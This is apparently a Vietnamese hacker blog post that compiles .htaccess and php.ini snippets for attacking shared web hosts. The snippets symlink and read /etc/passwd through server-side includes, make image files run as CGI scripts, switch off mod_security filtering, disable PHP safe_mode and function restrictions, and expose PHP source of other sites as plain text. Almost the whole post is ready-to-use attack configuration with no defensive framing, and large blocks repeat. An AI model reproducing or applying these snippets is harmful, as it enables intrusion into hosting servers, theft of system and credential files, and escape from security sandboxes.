Sử dụng tùy trường hợp
cgitelnet symlink htaccess
symljnk ghi vào file.hack
download file.hack về
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
SSI VIEW SYMLJNK
.htaccess
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
ln -s /etc/passwd tyn.txt
tyn.shtml:
<!--#include virtual="tyn.txt" -->
direct symljnk view file.php dưới dạng file text
options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php
Safe mod off
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
or
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
or
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
VIEW file.php
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
hạ safe_mode
php.ini
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
or
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
VIEW file.php
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
hạ safe_mode
php.ini
safe_mode = Off
disable_functions = ""
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
.htaccess
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
php_flag safe_mode off
php_flag disable_functions ""
.htaccess
php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
disable_functions = ""
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
.htaccess
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
php_flag safe_mode off
php_flag disable_functions ""
.htaccess
php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
php_value safe_mode off
php_value disable_functions ""
php_value disable_functions ""
.htaccess
SetEnv PHPRC /home/user/public_html/php.ini
SetEnv PHPRC /home/user/public_html/php.ini
.htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>
Source: TYN-UG™ Blog's
Đăng nhận xét